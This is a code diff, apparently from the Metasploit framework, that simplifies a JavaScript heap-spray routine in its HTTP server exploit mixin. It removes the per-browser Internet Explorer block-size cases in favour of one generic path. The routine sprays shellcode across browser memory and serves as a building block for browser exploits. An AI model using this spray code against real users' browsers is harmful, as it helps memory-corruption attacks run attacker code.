One size rules them all.

lib/msf/core/exploit/http/server.rb

@@ -799,8 +799,6 @@ protected
 	#
 	# The "sprayHeap" JavaScript function supports the following arguments:
 	#   shellcode     => The shellcode to spray in JavaScript.
-	#   browser       => The type of browser to target for precise block size, such as:
-	#                    'ie8', 'ie9', 'ie10', and 'generic'.
 	#   objId         => Optional. The ID for a <div> HTML tag.
 	#   offset        => Optional. Number of bytes to align the shellcode, default: 0x104
 	#   heapBlockSize => Optional. Allocation size, default: 0x80000
@@ -822,7 +820,6 @@ protected
 		function sprayHeap( oArg ) {
 
 			shellcode     = oArg.shellcode;
-			browser       = oArg.browser;
 			offset        = oArg.offset;
 			heapBlockSize = oArg.heapBlockSize;
 			maxAllocs     = oArg.maxAllocs;
@@ -832,7 +829,6 @@ protected
 			if (offset        == undefined)  { offset        = 0x104; }
 			if (heapBlockSize == undefined)  { heapBlockSize = 0x80000; }
 			if (maxAllocs     == undefined)  { maxAllocs     = 0x350; }
-			if (browser       == undefined)  { browser       = 'generic'; }
 
 			if (offset > 0x800) { throw "Bad alignment"; }
 
@@ -855,31 +851,8 @@ protected
 			for (var i = 0; i < maxAllocs; i++)
 			{
 				var obj = document.createElement("button");
-				switch (browser)
-				{
-					case 'ie8':
-						obj.title = data.substring(0, (heapBlockSize-6)/2);
-						div_container.appendChild(obj);
-						break;
-
-					case 'ie9':
-						obj.title = data.substring(0, (heapBlockSize-2)/2);
-						div_container.appendChild(obj);
-						break;
-
-					case 'ie10':
-						obj.title = data.substring(0, (heapBlockSize-2)/2);
-						div_container.appendChild(obj);
-						break;
-
-					case 'generic':
-						obj.title = data.substring(0, (heapBlockSize-2)/2);
-						div_container.appendChild(obj);
-						break;
-
-					default:
-						throw "Invalid argument";
-				}
+				obj.title = data.substring(0, (heapBlockSize-2)/2);
+				div_container.appendChild(obj);
 			}
 		}
 		|